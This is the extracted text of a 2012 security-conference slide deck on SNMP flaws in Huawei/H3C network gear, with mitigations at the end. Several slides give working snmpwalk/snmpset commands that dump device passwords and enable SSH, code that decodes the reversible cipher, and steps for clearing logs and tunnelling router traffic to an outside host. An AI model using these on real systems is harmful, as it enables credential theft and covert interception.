a country's honerable n3twork devices

A CouNtry's Honorable n3twork deviCes

Bay Threat 2012 @grutz

BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes

BACKGROUND

BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 2

Disclaimer

Any content or opinion stated herein is that of myself and not of my employer. The informaGon is being provided “as-‐is” and as a convenience, for informaGonal purposes only. Any resemblance to real persons, living or dead, is purely coincidental. No warranty is expressed or implied. Not responsible for direct, indirect, incidental or consequenGal damages resulGng from any defect, error or failure to perform. For recreaGonal use only. May be too intense for some viewers.


POLITICS!

This presentaGon does not care about the poli%cs between China, the US and any companies Data is presented to show the pervasive risk these new vulnerabiliGes create China was only used because they have the largest install base of Huawei and H3C equipment available via the Internet!


About @grutz….

PenetraGon tester In the business of breaking into businesses business business


The Huawei/H3C/HP Timeline


Huawei-‐3Com Partnership

2006

H3C is born! May 7, 2007

Bain Capital / Huawei / 3Com deal Sep 28, 2007

US Gov’t Smackdown

2008

HP Acquires H3C

April 12, 2010

US Gov’t Huawei/ZTE Smackdown Oct 8, 2012

Huawei != H3C

...except when they are (so`ware) Since the creaGon of H3C by Huawei-‐3Com the two companies diverged their product lines. Yet they sGll shared a very similar code origin (and bugs!) VulnerabiliGes described here and in FX’s talk can generally affect Huawei devices in the Huawei-‐3Com years (2006-‐2010) and all H3C devices BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 7

FX’s Huawei DEFCON Bomb


Huawei’s July 31, 2012 Response to c|net

hfp://news.cnet.com/8301-‐1009_3-‐57482813-‐83/expert-‐huawei-‐routers-‐are-‐riddled-‐with-‐vulnerabiliGes/


LETS TALK BIG BANG


Overflows are cool…

…but they’re finicky lifle beasts Huawei/H3C not as bad as Cisco IOS but, sGll.. How many Gmes have you used an IOS buffer overflow?

No, really… Be serious here!

Now how many Gmes have you used SNMP to download device configs? Which would you rely upon for network penetraGon?


h3c (old) vs hh3c (new) For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style. By default, devices use H3C new-style MIB files; http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228


(T)FTP File Transfers: hh3c-‐config-‐man

Funcaon OID Operator

OperaGon type 1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx 1 – running2Startup 2 – startup2Running 3 – running2Net 4 – net2Running 5 – net2Startup 6 – startup2Net

Protocol 1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx 1 – `p 2 – qtp 3 – cluster`p 4 – clusterqtp

Filename 1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx filename

DesGnaGon IP Address 1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx IpAddress

Username 1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx FTP Username

Password 1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx FTP Password

RowStatus 1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx 4 – go go go move move move!


hh3c-‐config-‐man caveats

Support it spofy between device types Mostly routers and switches work H3C ERxxxx Series: OpType = 1 (system2net)

Downloads are logged Requires Read/Write community string Buggy!

Manual “snmpset” worked some of the Gme Metasploit module worked some of the Gme


hfps://github.com/grutz/h3c-‐pt-‐tools/blob/master/hh3c-‐snmpdl.sh


Let’s script…

HP/H3C, SNMP, LOCAL ACCOUNTS AND YOU!


Usernames and Passwords in SNMP? Never!


Huawei/H3C Password Encrypaon Types

(h)h3cAuthMode designates encrypGon storage type: 0: No encrypGon 3: Ciphertext “encrypGon” 7-‐CZB#/YX]KQ=^Q`MAF4<1!! 9: SHA-‐256 encrypGon $key$hash_digest_value (Since 2007, Mostly AR devices)


hh3cUserLevel / hh3cUserState


RFC-‐1902: SMI for SNMPv2


What is MAX-‐ACCESS and read-‐create?

…so it’s protected, right?

Sure it is! Unless you know the SNMP READ ONLY string… This was probably a bug… or a misunderstanding…


Lets glob some users!

$ snmpwalk –c public –v 1 <host> \ 1.3.6.1.4.1.2011.10.2.12.1.1.1 Walks the locally defined list of users: local user <username>

password <clear|cipher|sha256> <value>

level [0|1|2|3]


Let’s Weaponize it!


Other SNMP goodies…

(h)h3c-‐dot11-‐cfg – (requires R/W access) SSID / PSKs

snmpwalk –v 1 –c private ip-address 1.3.6.1.4.1.2011.10.2.75

(h)h3c-‐ssh -‐ (requires R/W access)

SSH Server disabled? Enable it! snmpset –v 1 –c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1


Strap In and Let’s Scan China!


INCONCEIVABLE!

hfp://www.okean.com/chinacidr.txt 2,444 netblocks 290,118,656 hosts Only care about SNMP

Onesixtyone to the rescue! Originally by Solar Eclipse Updated in 2011 by Paul Flo Williams: hfps://github.com/hisdeedsaredust/onesixtyone


For best results use a VPS/host from a country China trusts


L33t b@$h sk1ddy

Huawei / H3C, 117,033

ZTE, 64,579

Cisco, 11,278

Juniper, 273 vxWorks, 8,121

Huawei / H3C, 88,517

ZTE, 33,669

Cisco, 2,475 Juniper, 99

-‐20,000

0

20,000

40,000

60,000

80,000

100,000

120,000

140,000

SNMP R/O

SNMP R/W

Source: Personal scan of China Netblock ranges using SNMP strings “public”, “private”, “h3c”, “china” and “telecom”


China Network Device Counts (Oct 2012)

Compare H3C results from ShodanHQ


(h)h3c-‐user Results

Devices with locally defined accounts: 15,588 Devices with ciphered passwords: 5,132 Devices with cleartext passwords: 15,263 Total accounts/passwords: 33,938 Unique passwords: 3,898 Username == Password: 2,101 Unique version strings: 686 A majority of cleartext-‐only passwords were from one Telecom company.


What Type of Accounts are these?

Local users can be used for: Remote management access (telnet, ssh, web) VPN access

In most cases telnet, ssh and hfp were open on devices with locally defined accounts.


Device type breakdown

Huawei/H3C VRP: 2,293 SecPath/SecBlade Firewalls: 464 WA2xxx Access Points: 2,771 Huawei Quidway: 3,205


SO ABOUT THAT CIPHER…


Huawei/H3C Not Unique In This

Weak and reversible ciphers seem to be a standard for all Networking companies at one Gme:

Cisco Type 7 Vinegere cipher Juniper $9$

Generally these are used because some protocols need to use cleartext passwords yet these should not be stored in the clear. So….why not ROT13? Just as secure…….


Cipher Examples

CLEARTEXT CIPHER

a D(HD%5.*MN;Q=^Q`MAF4<1!!

aa P+J^5@ZGG[3Q=^Q`MAF4<1!!

aaa +Q4Z3D_*-‐N[Q=^Q`MAF4<1!!

123 7-‐CZB#/YX]KQ=^Q`MAF4<1!!

aaaa EHHC8L%9.F3Q=^Q`MAF4<1!!

aaaaa X`9:NJ_A#$WQ=^Q`MAF4<1!!

aaaaaa B.7)"^_<OGCQ=^Q`MAF4<1!!

huawei N`C55QK<`=/Q=^Q`MAF4<1!!

aaaaaaaa 2P;JH_C3'+_Q=^Q`MAF4<1!!

aaaaaaaaaaaaaaaaaaaa 2P;JH_C3'+^'^KG@[*)9LZ*ZYF[R'$:5M(0=0\)*5WWQ=^Q`MAF4<<"TX$_S#6.NM(0=0\)*5WWQ=^Q`MAF4<1!!

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

2P;JH_C3'+^'^KG@[*)9LU<WK:`IEBCP2P;JH_C3'+_Q=^Q`MAF4<<"TX$_S#6.NM(0=0\)*5WWQ=^Q`MAF4<1!!


Want more examples? jfgi!


This means something…

Ciphers are 24 or 88 chars in length ‘!!’ at the end of everything

Base64 rotaGonal? Good idea, but no… didn’t pan out.

Consistent last few bytes of data:

Q=^Q`MAF4<1!! Consistent first 10 bytes (2P;JH_C3’+) when the cleartext is => 8 characters


Probably using a block-‐based cipher

IdenGcal plaintext blocks encrypt to idenGcal cipher blocks:


Binary/ASCII Encoding

Let’s assume DES-‐EBC: Probably a staGc key Input = cleartext + null padding

Output = binary data Binary result converted to printable ASCII ASCII NOT Base64 but similar (4 chars to 3 bytes) A consistent cipher string length based on source length means we’re probably correct. BayThreat 2012 -‐-‐ @grutz A CouNtry’s Honorable n3twork deviCes 40

Lets decode to binary! result = bytearray() chkval = ord('a') cipher_loc = 0 # converter works in groups of 4 until # cipherlen is reached for cnt in range(0, cipherlen, 4):

# group 1 cv1 = ord(cipher[cipher_loc]) if cv1 == chkval: cv1 = ord('?')

# group 2 cv2 = cv1-‐33 cipher_loc += 1 cv1 = ord(cipher[cipher_loc]) if cv1 != chkval: cv2 = cv2 << 6 else: cv1 = ord('?') # group 3 cv1 = cv1-‐33 cv2 = cv2 | cv1 cipher_loc += 1

cv1 = ord(cipher[cipher_loc]) if cv1 != chkval: cv2 = cv2 << 6 else: cv1 = ord('?') # group 4 cv1 = cv1-‐33 cv2 = cv2 | cv1 cipher_loc += 1 cv1 = ord(cipher[cipher_loc]) if cv1 != chkval: cv2 = cv2 << 6 else: cv1 = ord('?') # output cv1 = cv1-‐33 cv2 = cv2 | cv1 cipher_loc += 1 result.append((cv2 & 0xff0000) >> 16) result.append((cv2 & 0xff00) >> 8) result.append(cv2 & 0xff)


Huawei’s Soluaon

Use AES-‐256 and updated so`ware for SNMP Yes.. AES-‐256.. A symmetric cipher. hfp://support.huawei.com/enterprise/ReadLatestNewsAcGon.acGon?contentId=NEWS1000001141


HP/H3C’s Soluaon

Use SHA-‐256 on those systems that support it Upgrade your code for the SNMP fix. hfps://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-‐c03515685


So about this SHA-‐256…

Yeah, salted SHA-‐256. Not reversible but crackable! h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5 pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878


NOW WHAT?


Things to watch out for

All commands are logged locally > reset logbuffer

Keyboard keys are very annoying

Backspace is not backspace, unless it’s ^H


See All Packets!!! <rtr1> system-view [rtr-1] interface tunnel 1/0/1

[rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0

[rtr-1-Tunnel1/0/1] tunnel-protocol gre

[rtr-1-Tunnel1/0/1] source 10.10.1.1

[rtr-1-Tunnel1/0/1] destination 192.168.1.1

[rtr-1-Tunnel1/0/1] quit

[rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1

linux# modprobe ip_gre

linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255 linux# ip link set gre0 up

Linux# ip addr add 10.10.10.2/24 dev gre0


PROTECT YOURSELF


Be protected.. Be be protected!

Don't configure local accounts, use RADIUS or TACACS+ Don't configure SNMPv1 Don't use default SNMP strings Disable the snmp view for (h)h3c-‐user:

snmp-‐agent mib-‐view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1 snmp-‐agent mib-‐view excluded 1.3.6.1.4.1.25506.2.12.1.1.1

Use SHA256 passwords if your image supports it


QUESTIONS?

hfp://github.com/grutz/h3c-‐pt-‐tools/ hfp://grutztopia.jingojango.net/ Thanks to #metasploit, hdm, FX, eMaze (Ivan and Roberto), HP/H3C and Huawei IRTs, US-‐CERT and others whom I may have forgofen
